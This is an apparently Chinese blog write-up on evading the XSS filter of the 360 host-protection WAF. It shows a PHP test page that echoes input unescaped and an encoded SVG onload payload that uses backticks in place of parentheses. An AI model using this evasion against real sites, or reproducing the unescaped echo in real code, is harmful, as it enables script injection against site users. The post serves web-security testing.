xss绕过waf

本文探讨了360主机卫士在Apache环境下的XSS过滤特性,尽管软件已停止更新,但作者通过测试发现,利用HTML实体编码和URL编码可以绕过部分WAF拦截。文章分享了一种使用SVG标签结合特殊编码的XSS攻击payload,以及如何利用反引号替换括号来规避过滤。此外,还提供了多个测试绕过的payload实例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前言
360主机卫士是360旗下的服务器安全软件,为站长免费提供网站后门检测、木马查杀,网站补丁、漏洞防护等服务…
在这里插入图片描述

(虽然软件几年前就停止更新,官网挂了,但是从当时的评论上看软件还是很不错的。)

环境
火狐

360主机卫士Apache版

phpStudy2016(PHP-5.4.45+Apache)

测试代码

<?php   
  $input = @$_REQUEST["xss"];
  echo "<div>".$input."</div>"
?>

测试
习惯性的直接上 Burp 用平时收集的 payload fuzz 一遍,结果不怎么理想,能过的很鸡肋…然后我就去网上找资料,找到了一篇文章xss加入某些字符即可过大多数waf的思路及一些思考根据里面的思路可以绕过。

<svg onload> 拦截

<svg > onload>不拦截

具体绕过就是先把 > html实体编码
在这里插入图片描述

将 &#62 URL编码
在这里插入图片描述

大部分 xss payload 加上 %26%2362 即可绕过,但是类似 alert(1) 括号可能会被拦截 可以用反引号替换

<svg %26%2362 onload=alert`1`>

在这里插入图片描述

给几个测试绕过的 payload

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值